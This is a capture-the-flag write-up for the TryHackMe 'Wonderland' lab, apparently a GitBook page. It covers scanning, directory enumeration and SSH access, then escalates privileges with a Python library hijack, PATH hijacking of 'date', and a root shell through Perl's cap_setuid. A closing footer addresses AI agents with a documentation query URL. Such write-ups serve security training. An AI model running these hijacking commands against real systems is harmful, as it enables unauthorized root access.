# Wonderland ## Scanning ### Nmap ``` $ nmap -sV -sC 10.10.59.87 Starting Nmap 7.60 ( https://nmap.org ) at 2021-10-02 00:02 BST Nmap scan report for ip-10-10-59-87.eu-west-1.compute.internal (10.10.59.87) Host is up (0.0012s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA) | 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA) |_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (EdDSA) 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) |_http-title: Follow the white rabbit. MAC Address: 02:F4:A0:15:1D:53 (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.11 seconds ``` ## Enumeration ### Gobuster ``` $ gobuster dir -u http://10.10.59.87 -w /usr/share/wordlists/dirb/big.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.59.87 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/10/02 00:03:13 Starting gobuster =============================================================== /img (Status: 301) /poem (Status: 301) /r (Status: 301) =============================================================== 2021/10/02 00:03:14 Finished =============================================================== ``` `/img` & `/poem` nothing interesting no binaries ... check `/r` ![](/files/-MkyRePWmCXr0M7OYqRH) we will use same command of gobuster and add new directory to the url in this case we will use alphabet wordlist ``` $ gobuster dir -u http://10.10.59.87/r/ -w alpha.txt /a $ gobuster dir -u http://10.10.59.87/r/a -w alpha.txt /b $ gobuster dir -u http://10.10.59.87/r/a/b -w alpha.txt /b $ gobuster dir -u http://10.10.59.87/r/a/b/b -w alpha.txt /i $ gobuster dir -u http://10.10.59.87/r/a/b/b/i -w alpha.txt /t $ gobuster dir -u http://10.10.59.87/r/a/b/b/i/t -w alpha.txt ​ ``` the end ... no where to go open`http://10.10.59.87/r/a/b/b/i/t` on in browser�� ![](/files/-MkyRoM-uNRXusUtpNLY) **view source** ![](/files/-MkyRxEl42sMmOpJG9Jz) ## Initial Access ssh target using these credentials * [x] User Shell "Alice" ## Privilege Escalation ### Horizontal Escalation to Rabbit check if alice have any sudo privilege ``` alice@wonderland:~$ sudo -l [sudo] password for alice: Matching Defaults entries for alice on wonderland: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User alice may run the following commands on wonderland: (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py ``` �alice can run this script **walrus\_and\_the\_carpenter.py** with **rabbit** privilege check **walrus\_and\_the\_carpenter** this code use **python library** called **random** ![](/files/-MkyTNo6aZZu5K0VQfjB) so lets hijack this library know more about python library hijack [article](https://www.hackingarticles.in/linux-privilege-escalation-python-library-hijacking/) create fake library with same name ``` alice@wonderland:~$ echo "import os os.system('/bin/bash')" > random.py ``` run **walrus\_and\_the\_carpenter** with rabbit privilege ``` alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py rabbit@wonderland:~$ ``` * [x] User Shell "rabbit" ### Horizontal Escalation to Hatter check home directory `teaparty` here run it ![](/files/-MkyUQjbG3tzpuEr1gLb) it seems to trigger `$ date` command * write a command you wanna to execute in file with same name * export the path to path\_variable * run script ``` rabbit@wonderland:/home/rabbit$ echo "/bin/bash" > date rabbit@wonderland:/home/rabbit$ echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin rabbit@wonderland:/home/rabbit$ pwd /home/rabbit rabbit@wonderland:/home/rabbit$ export PATH=/home/rabbit:$PATH rabbit@wonderland:/home/rabbit$ echo $PATH /home/rabbit:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin rabbit@wonderland:/home/rabbit$ chmod 777 date rabbit@wonderland:/home/rabbit$ ./teaParty Welcome to the tea party! The Mad Hatter will be here soon. Probably by hatter@wonderland:/home/rabbit$ hatter@wonderland:/home/rabbit$ whoami hatter ``` * [x] User Shell "hatter" in this directory you can find password.txt login using ssh as hatter ### Vertical Escalate to Root check capabilities ``` hatter@wonderland:/home/hatter$ getcap -r / 2>/dev/null /usr/bin/perl5.26.1 = cap_setuid+ep /usr/bin/mtr-packet = cap_net_raw+ep /usr/bin/perl = cap_setuid+ep ``` we can `cap_setuid+ep` Perl check GTFOBins ``` hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' # id uid=0(root) gid=1003(hatter) groups=1003(hatter) ``` * [x] Root Shell --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xa1mn.gitbook.io/writeups/try-hack-me-thm/linux-boxes/wonderland.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.